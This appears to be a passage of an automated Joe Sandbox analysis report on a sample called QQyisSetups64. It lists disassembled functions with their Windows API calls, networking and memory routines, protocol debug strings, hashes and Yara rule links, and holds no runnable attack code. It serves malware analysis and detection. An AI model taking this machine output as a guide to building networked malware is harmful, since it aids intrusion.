InterlockedExchange.KERNEL32(?,00000000), ref: 02C8445D
WaitForSingleObject.KERNEL32(?,00001770), ref: 02C844AB
ResetEvent.KERNEL32(?), ref: 02C844C8

Part of subcall function 02C83F60: GetCurrentThreadId.KERNEL32 ref: 02C83F65
Part of subcall function 02C83F60: send.WS2_32(?,02C97440,00000010,00000000), ref: 02C83FC6
Part of subcall function 02C83F60: SetEvent.KERNEL32(?), ref: 02C83FE9
Part of subcall function 02C83F60: InterlockedExchange.KERNEL32(?,00000000), ref: 02C83FF5
Part of subcall function 02C83F60: WSACloseEvent.WS2_32(?), ref: 02C84003
Part of subcall function 02C83F60: shutdown.WS2_32(?,00000001), ref: 02C8401B
Part of subcall function 02C83F60: closesocket.WS2_32(?), ref: 02C84025

ResetEvent.KERNEL32(?), ref: 02C844DC

Memory Dump Source

Source File: 00000006.00000002.2575068878.0000000002C81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C80000, based on PE: true

Associated: 00000006.00000002.2575013434.0000000002C80000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2575240447.0000000002C95000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2575309576.0000000002C99000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2575391810.0000000002C9F000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2575482323.0000000002CA1000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2c80000_QQyisSetups64.jbxd

Similarity

API ID: Event$Reset$ExchangeInterlocked$CloseCurrentObjectSingleThreadTimeWaitclosesocketsendshutdowntime
String ID:
API String ID: 542259498-0
Opcode ID: b20656b50e44145c9894d2a4b5ef60055f0eae6fec54a5f0ac150edb803b2080
Instruction ID: 8ff531238c41698bebf9d9e69fe78b87c6346211c62280c3abe431f909556714
Opcode Fuzzy Hash: b20656b50e44145c9894d2a4b5ef60055f0eae6fec54a5f0ac150edb803b2080
Instruction Fuzzy Hash: D6218F76640704ABC630EF69EC88B97B3E8FF89714F104A1EF58AC7640D671A4108BA0

Function 03784E80 Relevance: 13.6, APIs: 9, Instructions: 70COMMON

Download Yara Rule

APIs

SetLastError.KERNEL32(0000139F,?), ref: 03784E99
TryEnterCriticalSection.KERNEL32(?,?), ref: 03784EB8
TryEnterCriticalSection.KERNEL32(?), ref: 03784EC2
SetLastError.KERNEL32(0000139F), ref: 03784ED9
LeaveCriticalSection.KERNEL32(?), ref: 03784EE2
LeaveCriticalSection.KERNEL32(?), ref: 03784EE9

Memory Dump Source

Source File: 00000006.00000002.2578511875.0000000003780000.00000040.00001000.00020000.00000000.sdmp, Offset: 03780000, based on PE: true

Associated: 00000006.00000002.2578511875.00000000037B4000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3780000_QQyisSetups64.jbxd

Similarity

API ID: CriticalSection$EnterErrorLastLeave
String ID:
API String ID: 4082018349-0
Opcode ID: 1e46e22dda893e0da3d542a5ab1aa0d0c7e7fa0e034d585ad4844eb68fb4fdfb
Instruction ID: bea21647c2cd6b9e49d4477ea591820c7c6959f371c6dfa6776a7be83a534e98
Opcode Fuzzy Hash: 1e46e22dda893e0da3d542a5ab1aa0d0c7e7fa0e034d585ad4844eb68fb4fdfb
Instruction Fuzzy Hash: 771186327447059BD320FB7AEC8497BF3ECEF88315B04492EE606C2541D675D804C7A5

Function 02C84E60 Relevance: 13.6, APIs: 9, Instructions: 70COMMON

Download Yara Rule

APIs

SetLastError.KERNEL32(0000139F,?), ref: 02C84E79
TryEnterCriticalSection.KERNEL32(?,?), ref: 02C84E98
TryEnterCriticalSection.KERNEL32(?), ref: 02C84EA2
SetLastError.KERNEL32(0000139F), ref: 02C84EB9
LeaveCriticalSection.KERNEL32(?), ref: 02C84EC2
LeaveCriticalSection.KERNEL32(?), ref: 02C84EC9

Memory Dump Source

Source File: 00000006.00000002.2575068878.0000000002C81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C80000, based on PE: true

Associated: 00000006.00000002.2575013434.0000000002C80000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2575240447.0000000002C95000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2575309576.0000000002C99000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2575391810.0000000002C9F000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2575482323.0000000002CA1000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2c80000_QQyisSetups64.jbxd

Similarity

API ID: CriticalSection$EnterErrorLastLeave
String ID:
API String ID: 4082018349-0
Opcode ID: e66cb1396afc9665a32265688e9e4e816cd5cf0bdef76fda28de881c76eb9d70
Instruction ID: 32d01f93c46d8c57ffbd65d63d754ef8d86b1e05073675fd2a5e28c2d2a919bb
Opcode Fuzzy Hash: e66cb1396afc9665a32265688e9e4e816cd5cf0bdef76fda28de881c76eb9d70
Instruction Fuzzy Hash: F61163326043459BC330EB79AC88A6BF3DCEF88659B404A2AE605C6540D771D915CAA5

Function 0378DD10 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 132COMMON

Download Yara Rule

APIs

SetLastError.KERNEL32(0000007F), ref: 0378DD32
SetLastError.KERNEL32(0000007F), ref: 0378DE35

Strings

Main, xrefs: 0378DD1F, 0378DD5C

Memory Dump Source

Source File: 00000006.00000002.2578511875.0000000003780000.00000040.00001000.00020000.00000000.sdmp, Offset: 03780000, based on PE: true

Associated: 00000006.00000002.2578511875.00000000037B4000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3780000_QQyisSetups64.jbxd

Similarity

API ID: ErrorLast
String ID: Main
API String ID: 1452528299-521822810
Opcode ID: 21cb4ea08eb0ffc60edf93beb6b3cbdd9850144658acca6c5d3c170562a989a7
Instruction ID: 679d43b85722c1e4176d5092c514d8e44477e95aa77651b78790e0d5d3b8c1e2
Opcode Fuzzy Hash: 21cb4ea08eb0ffc60edf93beb6b3cbdd9850144658acca6c5d3c170562a989a7
Instruction Fuzzy Hash: 0141E431A40205DFD720EF58D880BAAB3F4FF94314F0886AED8459B791E774E941CB90

Function 03783F60 Relevance: 12.1, APIs: 8, Instructions: 79networkthreadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 03783F65
SetLastError.KERNEL32(0000139F,?,771ADFA0,03783648), ref: 03784054

Part of subcall function 03782BC0: InterlockedCompareExchange.KERNEL32(?,00000001,00000000), ref: 03782BD6
Part of subcall function 03782BC0: SwitchToThread.KERNEL32 ref: 03782BEA

send.WS2_32(?,037A49C0,00000010,00000000), ref: 03783FC6
SetEvent.KERNEL32(?), ref: 03783FE9
InterlockedExchange.KERNEL32(?,00000000), ref: 03783FF5
WSACloseEvent.WS2_32(?), ref: 03784003
shutdown.WS2_32(?,00000001), ref: 0378401B
closesocket.WS2_32(?), ref: 03784025

Memory Dump Source

Source File: 00000006.00000002.2578511875.0000000003780000.00000040.00001000.00020000.00000000.sdmp, Offset: 03780000, based on PE: true

Associated: 00000006.00000002.2578511875.00000000037B4000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3780000_QQyisSetups64.jbxd

Similarity

API ID: EventExchangeInterlockedThread$CloseCompareCurrentErrorLastSwitchclosesocketsendshutdown
String ID:
API String ID: 3254528666-0
Opcode ID: d9020f6f781426970a0571350f026518a1da9a330adc5d4b351d9450deeff48a
Instruction ID: 49bdd24591cfbde8bcaf1508953f976b401919324af07605ff0e34f6221db930
Opcode Fuzzy Hash: d9020f6f781426970a0571350f026518a1da9a330adc5d4b351d9450deeff48a
Instruction Fuzzy Hash: 9A216D79240B019BE330EF69D88CB5BB7F5BB84B10F144D1CE69287A81D7B9E801CB50

Function 02C83F60 Relevance: 12.1, APIs: 8, Instructions: 79networkthreadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 02C83F65
SetLastError.KERNEL32(0000139F,?,771ADFA0,02C83648), ref: 02C84054

Part of subcall function 02C82B80: InterlockedCompareExchange.KERNEL32(?,00000001,00000000), ref: 02C82B96
Part of subcall function 02C82B80: SwitchToThread.KERNEL32 ref: 02C82BAA

send.WS2_32(?,02C97440,00000010,00000000), ref: 02C83FC6
SetEvent.KERNEL32(?), ref: 02C83FE9
InterlockedExchange.KERNEL32(?,00000000), ref: 02C83FF5
WSACloseEvent.WS2_32(?), ref: 02C84003
shutdown.WS2_32(?,00000001), ref: 02C8401B
closesocket.WS2_32(?), ref: 02C84025

Memory Dump Source

Source File: 00000006.00000002.2575068878.0000000002C81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C80000, based on PE: true

Associated: 00000006.00000002.2575013434.0000000002C80000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2575240447.0000000002C95000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2575309576.0000000002C99000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2575391810.0000000002C9F000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2575482323.0000000002CA1000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2c80000_QQyisSetups64.jbxd

Similarity

API ID: EventExchangeInterlockedThread$CloseCompareCurrentErrorLastSwitchclosesocketsendshutdown
String ID:
API String ID: 3254528666-0
Opcode ID: 399b99475bc806e38bf646b455c40def1d8ca0f7db0f3313111158968e6fc210
Instruction ID: 5d56cef9d915465a5a98c612b63ea8fe30807872063ecc618459a04dfd1225aa
Opcode Fuzzy Hash: 399b99475bc806e38bf646b455c40def1d8ca0f7db0f3313111158968e6fc210
Instruction Fuzzy Hash: A8217A712407009BD334AF28D88CB5BB7F5FB84B58F508E1CE68287A80C7B6E815CB90

Function 03784060 Relevance: 12.1, APIs: 8, Instructions: 78memoryCOMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?,?,00000000,03784039,?,771ADFA0,03783648), ref: 03784074
ResetEvent.KERNEL32(?,?,00000000,03784039,?,771ADFA0,03783648), ref: 03784087
ResetEvent.KERNEL32(?,?,00000000,03784039,?,771ADFA0,03783648), ref: 03784090
ResetEvent.KERNEL32(?,?,00000000,03784039,?,771ADFA0,03783648), ref: 03784099

Part of subcall function 03781350: HeapFree.KERNEL32(?,00000000,?,?,?,037840A6,?,00000000,03784039,?,771ADFA0,03783648), ref: 03781390

Part of subcall function 03781420: HeapFree.KERNEL32(?,00000000,?,?,?,037840B1,?,00000000,03784039,?,771ADFA0,03783648), ref: 0378143D
Part of subcall function 03781420: _free.LIBCMT ref: 03781459

HeapDestroy.KERNEL32(?,?,00000000,03784039,?,771ADFA0,03783648), ref: 037840B9
HeapCreate.KERNEL32(?,?,?,?,00000000,03784039,?,771ADFA0,03783648), ref: 037840D4
SetEvent.KERNEL32(?,?,00000000,03784039,?,771ADFA0,03783648), ref: 03784150
LeaveCriticalSection.KERNEL32(?,?,00000000,03784039,?,771ADFA0,03783648), ref: 03784157

Memory Dump Source

Source File: 00000006.00000002.2578511875.0000000003780000.00000040.00001000.00020000.00000000.sdmp, Offset: 03780000, based on PE: true

Associated: 00000006.00000002.2578511875.00000000037B4000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3780000_QQyisSetups64.jbxd

Similarity

API ID: EventHeap$Reset$CriticalFreeSection$CreateDestroyEnterLeave_free
String ID:
API String ID: 1219087420-0
Opcode ID: 8f9ebd8744ffef78f9ded0a92c47294eaec361e1e21d0c11bb74e754ce797177
Instruction ID: 226cead4b0c1a0fd962808a0bed5b93a92116fadeb3caf3faae61f8116b7f727
Opcode Fuzzy Hash: 8f9ebd8744ffef78f9ded0a92c47294eaec361e1e21d0c11bb74e754ce797177
Instruction Fuzzy Hash: 1B314674600A06EFD709EB39D898BA6F7A8FF48310F148649E429CB250DB79A811CFD0

Function 02C84060 Relevance: 12.1, APIs: 8, Instructions: 78memoryCOMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?,?,00000000,02C84039,?,771ADFA0,02C83648), ref: 02C84074
ResetEvent.KERNEL32(?,?,00000000,02C84039,?,771ADFA0,02C83648), ref: 02C84087
ResetEvent.KERNEL32(?,?,00000000,02C84039,?,771ADFA0,02C83648), ref: 02C84090
ResetEvent.KERNEL32(?,?,00000000,02C84039,?,771ADFA0,02C83648), ref: 02C84099

Part of subcall function 02C81350: HeapFree.KERNEL32(?,00000000,?,?,?,02C840A6,?,00000000,02C84039,?,771ADFA0,02C83648), ref: 02C81390

Part of subcall function 02C81420: HeapFree.KERNEL32(?,00000000,?,?,?,02C840B1,?,00000000,02C84039,?,771ADFA0,02C83648), ref: 02C8143D
Part of subcall function 02C81420: _free.LIBCMT ref: 02C81459

HeapDestroy.KERNEL32(?,?,00000000,02C84039,?,771ADFA0,02C83648), ref: 02C840B9
HeapCreate.KERNEL32(?,?,?,?,00000000,02C84039,?,771ADFA0,02C83648), ref: 02C840D4
SetEvent.KERNEL32(?,?,00000000,02C84039,?,771ADFA0,02C83648), ref: 02C84150
LeaveCriticalSection.KERNEL32(?,?,00000000,02C84039,?,771ADFA0,02C83648), ref: 02C84157

Memory Dump Source

Source File: 00000006.00000002.2575068878.0000000002C81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C80000, based on PE: true

Associated: 00000006.00000002.2575013434.0000000002C80000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2575240447.0000000002C95000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2575309576.0000000002C99000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2575391810.0000000002C9F000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2575482323.0000000002CA1000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2c80000_QQyisSetups64.jbxd

Similarity

API ID: EventHeap$Reset$CriticalFreeSection$CreateDestroyEnterLeave_free
String ID:
API String ID: 1219087420-0
Opcode ID: 82102b9bb7bf84bc29e107217b73bce1ad1ab85764b88e518c9a918851675974
Instruction ID: ff60bb9f4bb713d45443cb71d31f481f74d1e985a5ada7ac49723a92c45a926d
Opcode Fuzzy Hash: 82102b9bb7bf84bc29e107217b73bce1ad1ab85764b88e518c9a918851675974
Instruction Fuzzy Hash: 85311470600A02EFD709EB38C898BA6F7A9FF48318F148659E42987250DB75A965DFD0

Function 0360B62F Relevance: 10.9, APIs: 2, Strings: 4, Instructions: 351COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 0360B839
_memset.LIBCMT ref: 0360B86E

Part of subcall function 0360F0C6: _malloc.LIBCMT ref: 0360F0E0

Strings

6, xrefs: 0360B820
(, xrefs: 0360B7FD
gfff, xrefs: 0360B6F7
gfff, xrefs: 0360B6CF

Memory Dump Source

Source File: 00000006.00000002.2578011375.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3600000_QQyisSetups64.jbxd

Similarity

API ID: _memset$_malloc
String ID: ($6$gfff$gfff
API String ID: 3506388080-713438465
Opcode ID: 33456ebb2468a608b7ebcfb11b4406d8d4d11a59d9dc549158e7697d941f46b7
Instruction ID: e58977e4b6308ef8bdb6176a41099079027becc84b9b25fdf1d384100a1df144
Opcode Fuzzy Hash: 33456ebb2468a608b7ebcfb11b4406d8d4d11a59d9dc549158e7697d941f46b7
Instruction Fuzzy Hash: 5BD1ACB1E00318AFDB14DFE9DD85A9EBBB9FF48300F144529E905AB381D770A905CBA5

Function 03782140 Relevance: 10.8, APIs: 1, Strings: 5, Instructions: 303COMMON

Download Yara Rule

APIs

Part of subcall function 03781610: __vswprintf.LIBCMT ref: 03781646

_malloc.LIBCMT ref: 03782330

Part of subcall function 0378F673: __FF_MSGBANNER.LIBCMT ref: 0378F68C
Part of subcall function 0378F673: __NMSG_WRITE.LIBCMT ref: 0378F693
Part of subcall function 0378F673: RtlAllocateHeap.NTDLL(00000000,00000001,00000001,00000000,00000000,?,03794500,00000000,00000001,00000000,?,03798DE6,00000018,037A6448,0000000C,03798E76), ref: 0378F6B8

Strings

input wins: %lu, xrefs: 037823CF
input probe, xrefs: 037823A1
input ack: sn=%lu rtt=%ld rto=%ld, xrefs: 037822AC
input psh: sn=%lu ts=%lu, xrefs: 037822DF
[RI] %d bytes, xrefs: 0378216F

Memory Dump Source

Source File: 00000006.00000002.2578511875.0000000003780000.00000040.00001000.00020000.00000000.sdmp, Offset: 03780000, based on PE: true

Associated: 00000006.00000002.2578511875.00000000037B4000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3780000_QQyisSetups64.jbxd

Similarity

API ID: AllocateHeap__vswprintf_malloc
String ID: [RI] %d bytes$input ack: sn=%lu rtt=%ld rto=%ld$input probe$input psh: sn=%lu ts=%lu$input wins: %lu
API String ID: 3723585974-868042568
Opcode ID: 87cbc643b55f6991c41f868c657bee97b5e8837fc9a599c8ed061846164b9d2e
Instruction ID: 2cd545ce92b26b19b6ce3cf5c9b2b8932cb9718494cc3e1f46ff60d78a15c433
Opcode Fuzzy Hash: 87cbc643b55f6991c41f868c657bee97b5e8837fc9a599c8ed061846164b9d2e
Instruction Fuzzy Hash: E2B1E475A402058FCF18EF68D8846AAB7B5BF88311F184AAEDD499F347DB31D941CB90

Function 02C82140 Relevance: 10.8, APIs: 1, Strings: 5, Instructions: 303COMMON

Download Yara Rule

APIs

Part of subcall function 02C81610: __vswprintf.LIBCMT ref: 02C81646

_malloc.LIBCMT ref: 02C82330

Part of subcall function 02C86E83: __FF_MSGBANNER.LIBCMT ref: 02C86E9C
Part of subcall function 02C86E83: __NMSG_WRITE.LIBCMT ref: 02C86EA3
Part of subcall function 02C86E83: RtlAllocateHeap.NTDLL(00000000,00000001,00000001,00000000,00000000,?,02C89FB0,00000000,00000001,00000000,?,02C8C0CF,00000018,02C97C70,0000000C,02C8C15F), ref: 02C86EC8

Strings

[RI] %d bytes, xrefs: 02C8216F
input psh: sn=%lu ts=%lu, xrefs: 02C822DF
input ack: sn=%lu rtt=%ld rto=%ld, xrefs: 02C822AC
input probe, xrefs: 02C823A1
input wins: %lu, xrefs: 02C823CF

Memory Dump Source

Source File: 00000006.00000002.2575068878.0000000002C81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C80000, based on PE: true

Associated: 00000006.00000002.2575013434.0000000002C80000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2575240447.0000000002C95000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2575309576.0000000002C99000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2575391810.0000000002C9F000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2575482323.0000000002CA1000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2c80000_QQyisSetups64.jbxd

Similarity

API ID: AllocateHeap__vswprintf_malloc
String ID: [RI] %d bytes$input ack: sn=%lu rtt=%ld rto=%ld$input probe$input psh: sn=%lu ts=%lu$input wins: %lu
API String ID: 3723585974-868042568
Opcode ID: 810a8fe09b726a8026f5524bcf89b2fe6099777ac67758a986ce4edfff932714
Instruction ID: 1606b9130bde853c1e4320b8a840e67d2acd4269c15cd7ccb2de231d7585894f
Opcode Fuzzy Hash: 810a8fe09b726a8026f5524bcf89b2fe6099777ac67758a986ce4edfff932714
Instruction Fuzzy Hash: E0B1D371A002458FCF18EF68D8886AA77A6FF84318F08C5BEDD499B346D771D941CB92

Function 0360980F Relevance: 10.8, APIs: 5, Strings: 1, Instructions: 302COMMON

Download Yara Rule

APIs

_malloc.LIBCMT ref: 0360997F

Part of subcall function 0360F032: __FF_MSGBANNER.LIBCMT ref: 0360F04B
Part of subcall function 0360F032: __NMSG_WRITE.LIBCMT ref: 0360F052

_free.LIBCMT ref: 036099BF
_free.LIBCMT ref: 03609AF3
_memcpy_s.LIBCMT ref: 03609B42
_free.LIBCMT ref: 03609C55

Strings

&, xrefs: 036098A0

Memory Dump Source

Source File: 00000006.00000002.2578011375.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3600000_QQyisSetups64.jbxd

Similarity

API ID: _free$_malloc_memcpy_s
String ID: &
API String ID: 3027343870-3042966939
Opcode ID: bc8e6e112c061139a9596f3240d429f853c34e8cae2830de5eda6c03f43a5e61
Instruction ID: fe61393ae449355f5b60ef0351dd8d5fc71a9c6808dfe2fe0f80bb08eea19139
Opcode Fuzzy Hash: bc8e6e112c061139a9596f3240d429f853c34e8cae2830de5eda6c03f43a5e61
Instruction Fuzzy Hash: C0C180B1A002199BDB28CF55CDC0BABB3F9EF48300F0485ACE609A7251D774AA85CF58

Function 02881807 Relevance: 10.7, APIs: 7, Instructions: 152COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 0288184F
_free.LIBCMT ref: 0288188D
_free.LIBCMT ref: 028818CC
_free.LIBCMT ref: 0288190C
_free.LIBCMT ref: 02881934
_free.LIBCMT ref: 02881958
_free.LIBCMT ref: 02881990

Memory Dump Source

Source File: 00000006.00000002.2574280796.0000000002880000.00000040.00001000.00020000.00000000.sdmp, Offset: 02880000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2880000_QQyisSetups64.jbxd

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: 6beac5a88b0ea45cad91d564d56e12dc9c07d13e28084cda825bb388b8fc93ec
Instruction ID: 05bbfe49a138cca0893cbf220b9bb6614f7f3d3b771389502736332698b29426
Opcode Fuzzy Hash: 6beac5a88b0ea45cad91d564d56e12dc9c07d13e28084cda825bb388b8fc93ec
Instruction Fuzzy Hash: 5D514C7EA001159FD714EF58C4C4969BBA6FF89318B2980ADD50E9B321DB32ED42CF91

Function 03781830 Relevance: 10.7, APIs: 7, Instructions: 152COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 03781878
_free.LIBCMT ref: 037818B6
_free.LIBCMT ref: 037818F5
_free.LIBCMT ref: 03781935
_free.LIBCMT ref: 0378195D
_free.LIBCMT ref: 03781981
_free.LIBCMT ref: 037819B9

Part of subcall function 0378F639: RtlFreeHeap.NTDLL(00000000,00000000,?,03793E4C,00000000,?,03794500,00000000,00000001,00000000,?,03798DE6,00000018,037A6448,0000000C,03798E76), ref: 0378F64F
Part of subcall function 0378F639: GetLastError.KERNEL32(00000000,?,03793E4C,00000000,?,03794500,00000000,00000001,00000000,?,03798DE6,00000018,037A6448,0000000C,03798E76,00000000), ref: 0378F661

Memory Dump Source

Source File: 00000006.00000002.2578511875.0000000003780000.00000040.00001000.00020000.00000000.sdmp, Offset: 03780000, based on PE: true

Associated: 00000006.00000002.2578511875.00000000037B4000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3780000_QQyisSetups64.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: bc9a29134a23499f164261f3336eddb1ab47eaf1f4245c774c63561fb9990321
Instruction ID: 423b110018310a6a58e2ef87f018b88c0004e8f32c465c4c42715abffded0718
Opcode Fuzzy Hash: bc9a29134a23499f164261f3336eddb1ab47eaf1f4245c774c63561fb9990321
Instruction Fuzzy Hash: 315170B6A40214CFC704EF58D184965BBB6FF8926475A80ADC50AAF321D732BD43CF91

Function 02C81830 Relevance: 10.7, APIs: 7, Instructions: 152COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 02C81878
_free.LIBCMT ref: 02C818B6
_free.LIBCMT ref: 02C818F5
_free.LIBCMT ref: 02C81935
_free.LIBCMT ref: 02C8195D
_free.LIBCMT ref: 02C81981
_free.LIBCMT ref: 02C819B9

Part of subcall function 02C86E49: HeapFree.KERNEL32(00000000,00000000,?,02C89900,00000000,?,02C89FB0,00000000,00000001,00000000,?,02C8C0CF,00000018,02C97C70,0000000C,02C8C15F), ref: 02C86E5F
Part of subcall function 02C86E49: GetLastError.KERNEL32(00000000,?,02C89900,00000000,?,02C89FB0,00000000,00000001,00000000,?,02C8C0CF,00000018,02C97C70,0000000C,02C8C15F,00000000), ref: 02C86E71

Memory Dump Source

Source File: 00000006.00000002.2575068878.0000000002C81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C80000, based on PE: true

Associated: 00000006.00000002.2575013434.0000000002C80000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2575240447.0000000002C95000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2575309576.0000000002C99000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2575391810.0000000002C9F000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2575482323.0000000002CA1000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2c80000_QQyisSetups64.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 26734794671afdada2eed282c1d03668d977a1a28be6d788580249b1f56513f0
Instruction ID: 6737a9538888692115297624fab9e0bf6a457ed467e54a1d34ffdfb50af876d4
Opcode Fuzzy Hash: 26734794671afdada2eed282c1d03668d977a1a28be6d788580249b1f56513f0
Instruction Fuzzy Hash: 5F514BB2A00210DFD714EF59D484959BBE6BF8921C72AC1ADC50EAB311C772AE43CF91

Function 036011EF Relevance: 10.7, APIs: 7, Instructions: 152COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 03601237
_free.LIBCMT ref: 03601275
_free.LIBCMT ref: 036012B4
_free.LIBCMT ref: 036012F4
_free.LIBCMT ref: 0360131C
_free.LIBCMT ref: 03601340
_free.LIBCMT ref: 03601378

Memory Dump Source

Source File: 00000006.00000002.2578011375.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3600000_QQyisSetups64.jbxd

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: e6d8705c8b2e074a591befd5bcc494b5e10d3bbe54f6e4032036311d5e0cbfeb
Instruction ID: 148228400219242f55cc1213743123ca50432cbd074a5494aed21c2fd29fd457
Opcode Fuzzy Hash: e6d8705c8b2e074a591befd5bcc494b5e10d3bbe54f6e4032036311d5e0cbfeb
Instruction Fuzzy Hash: D65141BA600211CFD718DF58C6C18A6BBB6BF8A35471980ADD6199F361C732BD42CBD1

Function 03783870 Relevance: 10.6, APIs: 7, Instructions: 149threadnetworktimeCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 03783883
SetWaitableTimer.KERNEL32(?,?,?,00000000,00000000,00000000,?,00000000,FFFFD8F0,000000FF), ref: 037838C4
WSAWaitForMultipleEvents.WS2_32(00000004,?,00000000,000000FF,00000000), ref: 03783931
GetCurrentThreadId.KERNEL32 ref: 0378395C
GetLastError.KERNEL32(?,00000000,000000FF,00000000), ref: 037839F4
SetLastError.KERNEL32(0000139F,?,00000000,000000FF,00000000), ref: 03783A22
WSAGetLastError.WS2_32(?,00000000,000000FF,00000000), ref: 03783A39

Memory Dump Source

Source File: 00000006.00000002.2578511875.0000000003780000.00000040.00001000.00020000.00000000.sdmp, Offset: 03780000, based on PE: true

Associated: 00000006.00000002.2578511875.00000000037B4000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3780000_QQyisSetups64.jbxd

Similarity

API ID: ErrorLast$CurrentThread$EventsMultipleTimerWaitWaitable
String ID:
API String ID: 3058130114-0
Opcode ID: 8c5eda364e84f4f5b14652f85c64ffbffab5ff82619c5603af5bc3c978c89ffd
Instruction ID: be7d0ded7879bc51f615d60a015c601f5950071ae933859a62fa9109e7a83e10
Opcode Fuzzy Hash: 8c5eda364e84f4f5b14652f85c64ffbffab5ff82619c5603af5bc3c978c89ffd
Instruction Fuzzy Hash: 1651A47C6807019BEB20FF29C984B9AB7E8FF44B18F144919D956DB680EB74F841CB51

Function 02C83870 Relevance: 10.6, APIs: 7, Instructions: 149threadnetworktimeCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 02C83883
SetWaitableTimer.KERNEL32(?,?,?,00000000,00000000,00000000,?,00000000,FFFFD8F0,000000FF), ref: 02C838C4
WSAWaitForMultipleEvents.WS2_32(00000004,?,00000000,000000FF,00000000), ref: 02C83931
GetCurrentThreadId.KERNEL32 ref: 02C8395C
GetLastError.KERNEL32(?,00000000,000000FF,00000000), ref: 02C839F4
SetLastError.KERNEL32(0000139F,?,00000000,000000FF,00000000), ref: 02C83A22
WSAGetLastError.WS2_32(?,00000000,000000FF,00000000), ref: 02C83A39

Memory Dump Source

Source File: 00000006.00000002.2575068878.0000000002C81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C80000, based on PE: true

Associated: 00000006.00000002.2575013434.0000000002C80000.00000004.00001000.00020000.00000000.sdmpDownload File
